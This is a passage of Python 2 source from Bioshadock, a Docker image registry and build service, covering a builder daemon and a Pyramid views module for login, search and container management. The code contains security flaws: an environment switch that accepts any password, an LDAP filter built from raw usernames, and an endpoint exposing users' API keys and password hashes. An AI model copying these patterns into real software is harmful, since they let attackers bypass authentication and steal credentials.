labels.append(
{label.replace('.', '_'): label_elts})
if label == 'bioshadock.tests':
tests = json.loads(
base64.decodestring(label_elts))
if not tests and git_repo_dir and os.path.exists(os.path.join(git_repo_dir, 'test.yaml')):
log.debug('Load test.yaml for ' + build['id'] + ' from git repo')
with open(os.path.join(git_repo_dir, 'test.yaml'), 'r') as ymlfile:
commands = yaml.load(ymlfile)
tests = commands['test']['commands']
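# Expected test.yaml layout, inferred from the keys read above (the command strings are
# hypothetical examples):
#   test:
#     commands:
#       - mytool --version
#       - mytool --help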
if tests:
for test in tests:
test_container = None
try:
build['response'].append(
"Test: " + str(test) + "\n")
log.debug("Execute test for " + self.config['registry']['service'] + "/" + build['id'] + build_tag + ": " + str(test))
if '"' in test:
build['response'].append("Test:Skipping:test contains double quotes:"+test)
log.debug("Test:Skipping:test contains double quotes:"+test)
continue
command='sh -c "'+test+'"'
if git_repo_dir is not None:
host_config = BioshadockDaemon.cli.create_host_config(binds={
git_repo_dir: {
'bind': '/repo',
'mode': 'rw',
}
})
test_container = BioshadockDaemon.cli.create_container(
image=self.config['registry']['service'] + "/" + build['id'] + build_tag, command=command, host_config=host_config, environment=["R=R"])
else:
test_container = BioshadockDaemon.cli.create_container(
image=self.config['registry']['service'] + "/" + build['id'] + build_tag, command=command, environment=["R=R"])
response = BioshadockDaemon.cli.start(
container=test_container.get('Id'))
time.sleep(2)
test_container_inspect = BioshadockDaemon.cli.inspect_container(
test_container.get('Id'))
if test_container_inspect['State']['ExitCode'] != 0:
build['status'] = False
build['response'].append(
"Test result: Failed\n")
else:
build['response'].append(
"Test result: Success\n")
except Exception as e:
log.error("failed to test container " + self.config['registry']['service'] + "/" + build['id'] + build_tag + ': '+str(e))
build['status'] = False
build['response'].append("Test result: Failed\n")
try:
if test_container is not None:
BioshadockDaemon.cli.remove_container(
container=test_container.get('Id'))
except Exception as e:
log.error('Failed to remove test container '+str(test_container.get('Id'))+': '+str(e))
if not build['status']:
break
# p= subprocess.Popen(["docker",
# "push",
# config.get('app:main', 'service')+"/"+build['id']])
# docker save 49b5a7a88d5 | sudo docker-squash -t
# jwilder/whoami:squash | docker load
if do_squash and build['status']:
log.debug("Squash image " + self.config['registry']['service'] + "/" + build['id'] + build_tag)
log.debug("Save image")
(squash_image_handler, squash_image_file) = tempfile.mkstemp(suffix='.squash.tar')
(squashed_image_handler, squashed_image_file) = tempfile.mkstemp(suffix='.squashed.tar')
p = subprocess.Popen(["docker",
"save",
#"-o", "image.tar",
'-o', squash_image_file,
self.config['registry']['service'] + "/" + build[
'id'] + build_tag,
])
p.wait()
log.debug("Squash image")
p = subprocess.Popen(
[self.config['general']['squash']['docker-squash'],
#"-i", "image.tar",
"-i", squash_image_file,
#"-o", "squashed.tar",
"-o", squashed_image_file,
"-t", self.config['registry']['service'] + "/" + build['id'] + orig_build_tag,
])
p.wait()
log.debug("Reload image")
p = subprocess.Popen([
"docker", "load", "-i", squashed_image_file
#"docker", "load", "-i", "squashed.tar"
])
p.wait()
if os.path.exists(squash_image_file):
os.remove(squash_image_file)
if os.path.exists(squashed_image_file):
os.remove(squashed_image_file)
if build['status'] and self.config['clair']['use'] == 1:
log.debug('Analyse with Clair')
clair_check = True
layer_ids = self.analyse_with_clair(self.config['registry']['service'] + "/" + build['id'] + orig_build_tag)
if self.config['registry']['push'] == 0:
log.debug("Skip image push, keep local " + self.config['registry']['service'] + "/" + build['id'] + orig_build_tag)
try:
if do_squash:
log.debug("Remove squash image")
BioshadockDaemon.cli.remove_image(
self.config['registry']['service'] + "/" + build['id'] + ":squash")
except Exception as e:
log.error(
"Failed to remove image " + build['id'] + " " + str(e))
else:
if build['status']:
log.warn("Push image " + self.config['registry']['service'] + "/" + build['id'] + orig_build_tag)
try:
response = [line for line in BioshadockDaemon.cli.push(
self.config['registry']['service'] + "/" + build['id'] + orig_build_tag, stream=True)]
except Exception as e:
log.error(
"Failed to push image: " + build['id'] + " " + str(e))
build['status'] = False
build['response'].append(
"Failed to push to registry")
try:
log.debug("Remove images for " + self.config['registry']['service'] + "/" + build['id'])
if do_squash:
log.debug("Remove squash image")
BioshadockDaemon.cli.remove_image(
self.config['registry']['service'] + "/" + build['id'] + ":squash")
BioshadockDaemon.cli.remove_image(
self.config['registry']['service'] + "/" + build['id'] + orig_build_tag)
except Exception as e:
log.error(
"Failed to remove image " + build['id'] + " " + str(e))
else:
build['status'] = False
if is_cwl and cwl is None:
build['response'].append("Failed to get CWL")
build['timestamp'] = timestamp
build['progress'] = 'over'
if not build['status']:
build['progress'] = 'failed'
build['tag'] = info_tag
meta_info = {'meta.Dockerfile': dockerfile,
'meta.cwl': cwl,
'meta.Entrypoint': entrypoint,
'meta.Dockerlabels': labels,
'meta.layers': layer_ids,
'meta.version.'+info_tag.replace('.','_')+'.layers': layer_ids,
'meta.clair': clair_check
}
if tags:
meta_info['meta.tags'] = tags
log.debug(
"Update repository " + build['id'] + ": " + str(meta_info))
if description is not None:
meta_info['meta.docker_description'] = description
if size is not None:
meta_info['meta.docker_tags.' + info_tag.replace('.','_')] = {
'size': int(size), 'last_updated': timestamp, 'tag': info_tag}
if build['status']:
meta_info['meta.last_updated'] = timestamp
meta_info['meta.built'] = True
BioshadockDaemon.db_mongo['builds'].update(
{'_id': ObjectId(build['build'])}, build)
BioshadockDaemon.db_mongo[
'repository'].update({'id': build['id']},
{'$set': meta_info})
# Record specific tag info
if build['status']:
BioshadockDaemon.db_mongo['versions'].update(
{'repo': build['id'], 'version': info_tag},
{
'repo': build['id'],
'version': info_tag,
'dockerfile': dockerfile,
'cwl': cwl
},
upsert=True
)
log.debug('Update indexation')
updated_container = BioshadockDaemon.db_mongo['repository'].find_one({'id': build['id']})
es_repo = copy.deepcopy(updated_container)
del es_repo['_id']
del es_repo['builds']
del es_repo['meta']
es_repo['meta'] = {'description': updated_container['meta']['description'],
'short_description': updated_container['meta']['short_description'],
'tags': updated_container['meta']['tags']
}
BioshadockDaemon.es.index(index="bioshadock", doc_type='container', id=build['id'], body=es_repo)
if do_git:
cur_dir = os.path.dirname(os.path.realpath(__file__))
os.chdir(cur_dir)
log.debug(
"Cleaning directory " + cur_dir + " => " + git_repo_dir)
shutil.rmtree(git_repo_dir)
if self.run_once:
break
time.sleep(2)
if __name__ == "__main__":
pid_file = "/tmp/bioshadockbuilder.pid"
if "BIOSHADOCK_PID" in os.environ:
pid_file = os.environ["BIOSHADOCK_PID"]
daemon = BioshadockDaemon(pid_file)
if len(sys.argv) == 2:
if 'start' == sys.argv[1]:
daemon.start()
elif 'stop' == sys.argv[1]:
daemon.stop()
elif 'restart' == sys.argv[1]:
daemon.restart()
elif 'run' == sys.argv[1]:
daemon.run()
elif 'once' == sys.argv[1]:
daemon.run_once = True
daemon.run()
elif 'stats' == sys.argv[1]:
daemon.stats()
else:
print "Unknown command"
sys.exit(2)
sys.exit(0)
else:
print "usage: %s start|stop|restart|run|once|stats" % sys.argv[0]
sys.exit(2)
```
#### File: bioshadock/shadock/views.py
```python
from pyramid.view import view_config
from pyramid.response import Response
from pyramid.httpexceptions import HTTPFound, HTTPNotFound, HTTPForbidden, HTTPUnauthorized, HTTPBadRequest
import json
import datetime
import time
import base64
import struct
import re
import urllib3
import copy
import logging
import string
import random
import tempfile
import os
import subprocess
import bcrypt
import smtplib
from email.mime.text import MIMEText
from bson import json_util
from bson.json_util import dumps
from bson.objectid import ObjectId
from bson.errors import InvalidId
import jwt
from cryptography.hazmat.backends import default_backend
from cryptography.x509 import load_pem_x509_certificate
from cryptography.hazmat.primitives.serialization import (
load_pem_private_key, load_pem_public_key, load_ssh_public_key
)
from cryptography.hazmat.primitives import serialization
from basicauth import decode
import pymongo
from ldap3 import Server, Connection, AUTH_SIMPLE, STRATEGY_SYNC, STRATEGY_ASYNC_THREADED, SEARCH_SCOPE_WHOLE_SUBTREE, GET_ALL_INFO
from bioshadock_biotools.parser import Parser
from bioshadock_biotools.biotools import BioTools
from clair.clair import Clair
def notify_new_container_email(request, repo):
if not request.registry.config['general']['mail']['smtp_host'] or not request.registry.config['general']['mail']['to']:
logging.debug('No smtp or to email configuration, skipping mail notification')
return
to = request.registry.config['general']['mail']['to']
subject = 'New container created: ' + str(repo['id'])
message = 'New container: ' + str(repo['id'])
msg = MIMEText(message)
msg['Subject'] = subject
msg['From'] = request.registry.config['general']['mail']['from']
msg['To'] = request.registry.config['general']['mail']['to']
try:
s = smtplib.SMTP(request.registry.config['general']['mail']['smtp_host'], request.registry.config['general']['mail']['smtp_port'])
if request.registry.config['general']['mail']['tls']:
s.starttls()
if request.registry.config['general']['mail']['smtp_user']:
s.login(request.registry.config['general']['mail']['smtp_user'], request.registry.config['general']['mail']['smtp_password'])
s.sendmail(msg['From'], [msg['To']], msg.as_string())
s.quit()
except Exception as e:
logging.error('Email error: ' + str(e))
def build_container(request, build):
request.registry.db_redis.hincrby('bioshadock:user:builds', build['user'], 1)
request.registry.db_redis.rpush('bioshadock:builds:' + build['user'], dumps(build))
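# Builds are queued per user: the hash 'bioshadock:user:builds' counts submissions and the list
# 'bioshadock:builds:<user>' holds the serialized build requests that BioshadockDaemon.run()
# in builder.py pops round-robin.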
def is_admin(username, request):
user = request.registry.db_mongo['users'].find_one({'id': username})
if user is None:
return False
if user['role'] == 'admin':
return True
return False
def can_push_to_library(username, request):
user = request.registry.db_mongo['users'].find_one({'id': username})
if user is None:
return False
if user['role'] == 'admin' or user['role'] == 'editor':
return True
return False
def valid_user(username, password, request):
if 'BIOSHADOCK_AUTH' in os.environ and os.environ['BIOSHADOCK_AUTH'] == 'fake':
return True
user = request.registry.db_mongo['users'].find_one({'id': username})
if user is None or 'password' not in user:
# If user logged via social, no password available, use apikey for authentication on API
if user is not None and 'type' in user and user['type'] == 'social':
if user['apikey'] and user['apikey'] == password:
return True
ldap_dn = request.registry.config['ldap']['dn']
base_dn = 'ou=People,' + ldap_dn
ldapfilter = "(&(|(uid=" + username + ")(mail=" + username + ")))"
try:
attrs = ['uid', 'mail']
con = Connection(request.registry.ldap_server, auto_bind=True, client_strategy=STRATEGY_SYNC, check_names=True)
con.search(base_dn, ldapfilter, SEARCH_SCOPE_WHOLE_SUBTREE, attributes=attrs)
if con.response:
user_dn= None
user_id = None
for r in con.response:
user_dn = str(r['dn'])
user_id = r['attributes']['uid']
con.unbind()
con = Connection(request.registry.ldap_server, auto_bind=True, read_only=True, client_strategy=STRATEGY_SYNC, user=user_dn, password=password, authentication=AUTH_SIMPLE, check_names=True)
con.unbind()
else:
con.unbind()
return False
if user_dn is not None and user is None:
role = 'contributor'
if username in request.registry.admin:
role = 'admin'
apikey = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(20))
request.registry.db_mongo['users'].insert({'id': username,
'role': role,
'apikey': apikey,
'type': 'ldap'})
except Exception as e:
logging.error(str(e))
return False
else:
print "local user"
if bcrypt.hashpw(password.encode('utf-8'), user['password'].encode('utf-8')) == user['password']:
return True
else:
return False
return True
def is_logged(request):
'''
Check if user is logged, return user info or None
'''
if request.authorization is not None:
try:
(type, bearer) = request.authorization
secret = request.registry.config['registry']['secret_passphrase']
# If decode ok and not expired
user = jwt.decode(bearer, secret, audience='urn:bioshadock/auth')
return user['user']
except Exception:
return None
return None
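# The bearer checked here is the JWT issued by user_bind() below (audience 'urn:bioshadock/auth',
# one hour lifetime); a decode failure or an expired token is treated as "not logged in".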
@view_config(route_name='users', renderer='json', request_method='GET')
def users(request):
session_user = is_logged(request)
if session_user is None:
return HTTPForbidden('User not logged')
users = request.registry.db_mongo['users'].find({})
res = []
for user in users:
res.append(user)
return res
@view_config(route_name='user', renderer='json', request_method='POST')
def user(request):
session_user = is_logged(request)
if session_user is None:
return HTTPForbidden('User not logged')
user = request.registry.db_mongo['users'].find_one({'id': request.matchdict['id']})
if user is None:
return HTTPNotFound()
if not is_admin(session_user['id'], request):
return HTTPForbidden()
if session_user['id'] == user['id']:
return HTTPForbidden()
form = json.loads(request.body, encoding=request.charset)
user['role'] = form['role']
request.registry.db_mongo['users'].update({'id': user['id']},{'$set': {'role': user['role']}})
return user
@view_config(route_name='config', renderer='json', request_method='GET')
def config(request):
config = {
'registry': request.registry.config['registry']['docker'],
'service': request.registry.config['registry']['service'],
'issuer': request.registry.config['registry']['issuer']
}
return config
@view_config(route_name='user_is_logged', renderer='json', request_method='GET')
def user_is_logged(request):
user = is_logged(request)
if user is None:
return HTTPNotFound('User not logged')
else:
return user
@view_config(route_name='user_bind', renderer='json', request_method='POST')
def user_bind(request):
form = json.loads(request.body, encoding=request.charset)
uid = form['uid']
password = form['password']
token = None
if form and 'token' in form:
token = form['token']
if token:
secret = request.registry.config['registry']['secret_passphrase']
user = jwt.decode(token, secret, audience='urn:bioshadock/auth')
uid = user['user']['id']
user = request.registry.db_mongo['users'].find_one({'id': uid})
if user is not None and 'type' in user and user['type'] == 'ldap':
return HTTPUnauthorized('Trying to connect with the id of an existing user')
if user is None:
role = 'visitor'
apikey = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(20))
request.registry.db_mongo['users'].insert({'id': uid,
'role': role,
'apikey': apikey,
'type': 'social'})
else:
if not valid_user(uid, password, request):
return HTTPUnauthorized('Invalid credentials')
user = request.registry.db_mongo['users'].find_one({'id': uid})
if not user:
return HTTPUnauthorized('Invalid credentials')
secret = request.registry.config['registry']['secret_passphrase']
del user['_id']
token = jwt.encode({'user': user,
'exp': datetime.datetime.utcnow() + datetime.timedelta(seconds=3600),
'aud': 'urn:bioshadock/auth'}, secret)
return { 'user': user, 'token': token }
@view_config(route_name='search', renderer='json', request_method='GET')
def search_es(request):
q = request.params['q']
user = is_logged(request)
conditions = []
key = "_all"
value = q
if ":" in q:
elts = q.split(":")
key = 'meta.' + elts[0]
value = elts[1]
query = [ {"term": {key: value}}]
if user is None:
query.append({"term": {"visible": True}})
else:
conditions.append({"term": {"visible": True}})
conditions.append({"term": {"user": user['id']}})
conditions.append({"term": {"acl_push.members": user['id']}})
conditions.append({"term": {"acl_pull.members": user['id']}})
res = request.registry.es.search(
index = "bioshadock",
search_type = 'query_then_fetch',
size = 1000,
body = {
"query" : { "filtered" : { "filter" : { "bool" :
{"must": query, "should": conditions},
} } },
})
return res
@view_config(route_name='containers_latest', renderer='json', request_method='GET')
def containers_latest(request):
repos = request.registry.db_mongo['repository'].find({'library': True},{'id': 1, 'description': 1}, sort=[('_id', pymongo.DESCENDING)], limit=20)
library_containers = []
for container in repos:
library_containers.append(container)
return library_containers
@view_config(route_name='containers_all', renderer='json', request_method='GET')
def containers_all(request):
light = False
if 'light' in request.params:
light = True
user = is_logged(request)
if user is None or not is_admin(user['id'], request):
#return HTTPForbidden()
repos = request.registry.db_mongo['repository'].find({'visible': True})
else:
repos = request.registry.db_mongo['repository'].find()
user_repos = []
for repo in repos:
if 'builds' in repo:
del repo['builds']
if 'Dockerfile' in repo['meta'] and repo['meta']['Dockerfile']:
repo['meta']['Dockerfile'] = True
else:
repo['meta']['Dockerfile'] = False
if light:
if 'built' not in repo['meta']:
repo['meta']['built'] = False
if 'short_description' not in repo['meta']:
repo['meta']['short_description'] = repo['meta']['description']
if 'git' not in repo['meta']:
repo['meta']['git'] = None
user_repos.append({
'id': repo['id'],
'meta': {
'short_description': repo['meta']['short_description'],
'built': repo['meta']['built'],
'git': repo['meta']['git'],
'Dockerfile': repo['meta']['Dockerfile']
},
'user': repo['user'],
'visible': repo['visible']
})
else:
user_repos.append(repo)
return user_repos
@view_config(route_name='builds', renderer='json', request_method='GET')
def builds(request):
'''
Get all builds for container, remove response log to limit size
'''
user = is_logged(request)
if user is None:
return HTTPForbidden()
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
builds = request.registry.db_mongo['builds'].find({'id': repo_id}, {'response': 0})
res = []
for build in builds:
res.append(build)
return res
@view_config(route_name='build', renderer='json', request_method='GET')
def build(request):
'''
Get a build with complete response
'''
user = is_logged(request)
if user is None:
return HTTPForbidden()
build_id = request.matchdict['id']
build = request.registry.db_mongo['builds'].find_one({'_id': ObjectId(build_id)})
repo_id = build['id']
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
return build
@view_config(route_name='containers', renderer='json', request_method='GET')
def containers(request):
user = is_logged(request)
if user is None:
return HTTPForbidden()
repos = request.registry.db_mongo['repository'].find({'$or': [{'user': user['id']}, {'acl_pull.members': user['id']}]})
user_repos = []
for repo in repos:
if 'builds' in repo:
del repo['builds']
if 'Dockerfile' in repo['meta'] and repo['meta']['Dockerfile']:
repo['meta']['Dockerfile'] = True
else:
repo['meta']['Dockerfile'] = False
user_repos.append(repo)
return user_repos
@view_config(route_name='container_manifest', renderer='json', request_method='POST')
def container_manifest(request):
user = is_logged(request)
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
form = json.loads(request.body, encoding=request.charset)
token = form['token']
tag = form['tag']
http = urllib3.PoolManager()
headers = {'Authorization': 'Bearer '+token,
'Accept': 'application/vnd.docker.distribution.manifest.v2+json'}
r = http.request('GET', request.registry.config['registry']['docker']+'/v2/'+repo_id+'/manifests/'+tag, headers=headers)
if r.status != 200:
return Response('could not get the manifest', status_code = r.status)
res = json.loads(r.data)
docker_content_digest = None
if 'Docker-Content-Digest' in r.headers:
docker_content_digest = r.headers['Docker-Content-Digest']
else:
docker_content_digest = res['manifests'][0]['digest']
res['Docker-Content-Digest'] = docker_content_digest
return res
@view_config(route_name='container_metaelixir', renderer='json')
def container_metaelixir(request):
repo_id = '/'.join(request.matchdict['id'])
http = urllib3.PoolManager()
r = http.request('GET', request.registry.config['elixir']['biotools_url']+'/api/tool/'+repo_id)
if r.status != 200:
return Response('could not get the metadata', status_code = r.status)
return json.loads(r.data)
@view_config(route_name='container_elixir', renderer='json')
def container_elixir(request):
'''
Update elixir from a container Dockerfile
/container/elixir/x/y/z
'''
if not request.registry.config['elixir']['script']:
return HTTPForbidden('Not configured for Elixir updates')
user = is_logged(request)
if user is None:
try:
apikey = request.params['apikey']
user = request.registry.db_mongo['users'].find_one({'apikey': apikey})
if user is None:
return HTTPForbidden()
except Exception:
return HTTPForbidden()
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
dockerFile = repo['meta']['Dockerfile']
if dockerFile is None or not dockerFile:
return HTTPNotFound('No Dockerfile available')
(tmpfh, tmpfilepath) = tempfile.mkstemp(prefix='elixir')
tmpfile = open(tmpfilepath, 'w')
tmpfile.write(dockerFile)
tmpfile.close()
(tmpfh, tmpxmlpath) = tempfile.mkstemp(prefix='elixir', suffix='.xml')
softname = repo_id.split('/')[-1]
resource = None
try:
parser = Parser(tmpfilepath)
templFile = request.registry.config['elixir']['template']
if not templFile or not os.path.exists(templFile):
return HTTPForbidden('Configuration error, missing template.xml')
parser.parse(templFile, tmpxmlpath)
username = request.registry.config['elixir']['login']
password = request.registry.config['elixir']['password']
options = {
'act': 'update',
'resFile': tmpxmlpath,
'xmlTransportFormat': True
}
biotools = BioTools(options)
resource = biotools.get_resource(options)
jsonResp = biotools.execLoginCmd(username, password)
if 'token' not in jsonResp:
return HTTPForbidden('Could not authenticate against bio.tools')
jsonResp = biotools.execRegisterOrUpdateCmd(jsonResp['token'], tmpxmlpath, "application/xml")
except Exception as e:
logging.error("Elixir bio.tools call error: "+str(e))
return {'msg': 'An error occurred, please contact support team'}
os.remove(tmpfilepath)
os.remove(tmpxmlpath)
affiliation = request.registry.config['elixir']['affiliation']
elixir_name = affiliation+'/'+softname
if 'name' in resource and resource['name']:
elixir_name = affiliation+'/'+resource['name']
request.registry.db_mongo['repository'].update({'_id': repo['_id']},{'$set': {'meta.elixir': elixir_name}})
return {'msg': 'Request executed', 'elixir': elixir_name}
@view_config(route_name='container_tag', renderer='json')
def container_tag(request):
'''
Tags a container
/container/tag/x/y/z/:tagid
'''
user = is_logged(request)
if user is None:
try:
apikey = request.params['apikey']
user = request.registry.db_mongo['users'].find_one({'apikey': apikey})
if user is None:
return HTTPForbidden()
except Exception:
return HTTPForbidden()
repo_elts = list(request.matchdict['id'])
tag = repo_elts.pop()
repo_id = '/'.join(repo_elts)
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
user_id = user['id']
container = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if 'git' not in container['meta'] and not container['meta']['Dockerfile']:
return HTTPForbidden()
build = request.registry.db_mongo['builds'].insert({'id': repo_id,
'progress': 'waiting'})
newbuild = {
'id': repo_id,
'build': str(build),
'date': datetime.datetime.now(),
'dockerfile': container['meta']['Dockerfile'],
'git': None,
'cwl_path': container['meta']['cwl_path'],
'user': user_id,
'tag': tag
}
if 'git' in container['meta']:
newbuild['git'] = container['meta']['git']
build_container(request, newbuild)
# request.registry.db_redis.rpush('bioshadock:builds', dumps(newbuild))
return {'repo': repo_id, 'tag': tag}
@view_config(route_name='container_git', renderer='json')
def container_git(request):
'''
Trigger for a git rebuild; must contain a Dockerfile in the git repo or in the container definition
'''
user = is_logged(request)
if user is None:
try:
apikey = request.params['apikey']
user = request.registry.db_mongo['users'].find_one({'apikey': apikey})
if user is None:
return HTTPForbidden()
except Exception:
return HTTPForbidden()
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
user_id = 'anonymous'
if user is not None:
user_id = user['id']
container = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if 'git' not in container['meta']:
return HTTPForbidden()
build = request.registry.db_mongo['builds'].insert({'id': repo_id,
'progress': 'waiting'})
newbuild = {
'id': repo_id,
'build': str(build),
'date': datetime.datetime.now(),
'dockerfile': container['meta']['Dockerfile'],
'git': container['meta']['git'],
'cwl_path': container['meta']['cwl_path'],
'user': user_id
}
build_container(request, newbuild)
# request.registry.db_redis.rpush('bioshadock:builds', dumps(newbuild))
return {}
@view_config(route_name='container_dockerfile', renderer='json', request_method='POST')
def container_dockerfile(request):
user = is_logged(request)
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
form = json.loads(request.body, encoding=request.charset)
dockerfile = form['dockerfile']
if 'git' not in form:
form['git'] = None
request.registry.db_mongo['repository'].update({'id': repo_id},{'$set': {'meta.Dockerfile': dockerfile}})
build = request.registry.db_mongo['builds'].insert({'id': repo_id,
'progress': 'waiting'})
cwl_path = None
if 'cwl_path' in repo['meta']:
cwl_path = repo['meta']['cwl_path']
newbuild = {
'id': repo_id,
'build': str(build),
'date': datetime.datetime.now(),
'dockerfile': dockerfile,
'git': form['git'],
'user': user['id'],
'cwl_path': cwl_path
}
build_container(request, newbuild)
# request.registry.db_redis.rpush('bioshadock:builds', dumps(newbuild))
return {}
@view_config(route_name='container_tags', renderer='json', request_method='POST')
def container_tags(request):
user = is_logged(request)
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
form = json.loads(request.body, encoding=request.charset)
token = form['token']
http = urllib3.PoolManager()
headers = {'Authorization': 'Bearer '+token}
r = http.request('GET', request.registry.config['registry']['service']+'/v2/'+repo_id+'/tags/list', headers=headers)
if r.status != 200:
return Response('could not get the manifest', status_code = r.status)
return json.loads(r.data)
@view_config(route_name='container', renderer='json', request_method='DELETE')
def container_delete(request):
user = is_logged(request)
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if user is None:
return HTTPForbidden()
if repo is None:
return HTTPNotFound()
if not (is_admin(user['id'], request) or repo['user'] == user['id'] or user['id'] in repo['acl_push']['members']):
return HTTPForbidden()
# Get digest from manifest Docker-Content-Digest sha256:95b09cb5b7cd38d73a7dc9618c34148559cf1ed3a0066c85d37e1d6cf4fb9004
# Send DELETE request DELETE /v2/<name>/manifests/<reference>
# Commented, removing image seems to remove some layers used by other image
# Delete from database but keep in ever growing registry
'''
form = json.loads(request.body, encoding=request.charset)
token = form['token']
tag = 'latest'
if 'tag' in form:
tag = form['tag']
http = urllib3.PoolManager()
headers = {'Authorization': 'Bearer '+token,
'Accept': 'application/vnd.docker.distribution.manifest.v2+json'}
r = http.request('GET', request.registry.config['registry']['docker']+'/v2/'+repo_id+'/manifests/'+tag, headers=headers)
if r.status == 404:
logging.warn('Registry could not get the manifest '+repo_id)
else:
res = json.loads(r.data)
docker_content_digest = None
if 'Docker-Content-Digest' in r.headers:
docker_content_digest = r.headers['Docker-Content-Digest']
else:
docker_content_digest = res['manifests'][0]['digest']
r = http.request('DELETE', request.registry.config['registry']['docker']+'/v2/'+repo_id+'/manifests/'+docker_content_digest, headers=headers)
if r.status != 202:
logging.error('Could not find or delete image ' + repo_id + 'in registry')
'''
request.registry.db_mongo['repository'].remove({'id': repo_id})
request.registry.db_mongo['builds'].remove({'id': repo_id})
request.registry.db_mongo['versions'].remove({'repo': repo_id})
request.registry.es.delete(index="bioshadock", doc_type='container', id=repo_id)
return repo
@view_config(route_name='container', renderer='json', request_method='POST')
def container_update(request):
user = is_logged(request)
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if user is None:
return HTTPForbidden()
if repo is None:
return HTTPNotFound()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_push']['members']:
return HTTPForbidden()
form = json.loads(request.body, encoding=request.charset)
if 'git' not in form['meta']:
form['meta']['git'] = None
if 'elixir' not in form['meta']:
form['meta']['elixir'] = None
if 'cwl_path' not in form['meta']:
form['meta']['cwl_path'] = None
updates = {
'acl_push.members': form['acl_push']['members'],
'acl_pull.members': form['acl_pull']['members'],
'meta.description': form['meta']['description'],
'meta.short_description': form['meta']['short_description'],
'meta.tags': form['meta']['tags'],
'meta.terms': form['meta']['terms'],
'meta.git': form['meta']['git'],
'meta.elixir': form['meta']['elixir'],
'meta.cwl_path': form['meta']['cwl_path'],
'visible': form['visible']
}
repo['acl_push']['members'] = form['acl_push']['members']
repo['acl_pull']['members'] = form['acl_pull']['members']
repo['meta']['description'] = form['meta']['description']
repo['meta']['tags'] = form['meta']['tags']
repo['meta']['terms'] = form['meta']['terms']
repo['meta']['cwl_path'] = form['meta']['cwl_path']
repo['visible'] = form['visible']
if is_admin(user['id'], request) or repo['user'] == user['id'] or user['id'] in repo['acl_push']['members']:
repo['user_can_push'] = True
else:
repo['user_can_push'] = False
request.registry.db_mongo['repository'].update({'id': repo_id}, {'$set': updates})
es_repo = copy.deepcopy(repo)
del es_repo['_id']
del es_repo['builds']
request.registry.es.index(index="bioshadock", doc_type='container', id=repo_id, body=es_repo)
return repo
@view_config(route_name='clair_notification', renderer='json', request_method='POST')
def clair_notification(request):
'''
Receive a Clair notification about an update. Simply delete notification, no handling for the moment
'''
form = json.loads(request.body, encoding=request.charset)
notif = form['Notification']['Name']
'''
page = 1
limit = 100
# Get notification
loop = True
while loop:
r = http.request('GET', request.registry.settings['clair.host']+'/v1/notification/'+notif+'?page='+str(page)+'&limit='+str(limit))
if r.status != 200:
loop = False
res = json.loads(r.data)
layers = res['Notification']['New']['LayersIntroducingVulnerability']
for layer in layers:
# Find repo using layer and update notifications
page += 1
'''
# Mark as read
http = urllib3.PoolManager()
http.request('DELETE', request.registry.config['clair']['host']+'/v1/notification/'+notif)
return {}
@view_config(route_name='container_vulnerabilities', renderer='json', request_method='GET')
def container_vulnerabilities(request):
user = is_logged(request)
repo_id = '/'.join(request.matchdict['id'])
repo = request.registry.db_mongo['repository'].find_one({'id': repo_id})
if repo is None:
return HTTPNotFound()
if not repo['visible']:
if user is None:
return HTTPForbidden()
if not is_admin(user['id'], request) and repo['user'] != user['id'] and user['id'] not in repo['acl_pull']['members']:
return HTTPForbidden()
# Get vulnerabilities from Clair
if request.registry.config['clair']['use'] != 1:
return HTTPForbidden()
cfg = {
'clair.host': request.registry.config['clair']['host'],
'docker.connect': request.registry.config['services']['docker']['connect']
}
image_vulnerabilities = Clair(cfg)
version = None
try:
version = request.params['version'].replace('.', '_')
except Exception:
pass
logging.debug('Search vulnerabilities for '+repo_id+':'+str(version))
if version is not None:
